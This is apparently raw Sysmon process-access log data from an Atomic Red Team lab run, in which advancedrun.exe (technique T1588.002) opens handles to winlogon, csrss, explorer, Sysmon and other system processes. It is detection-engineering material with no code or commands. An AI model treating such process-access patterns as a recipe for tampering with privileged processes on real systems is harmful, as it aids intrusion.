17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983120Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983118Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003983109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983108Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983107Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983105Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
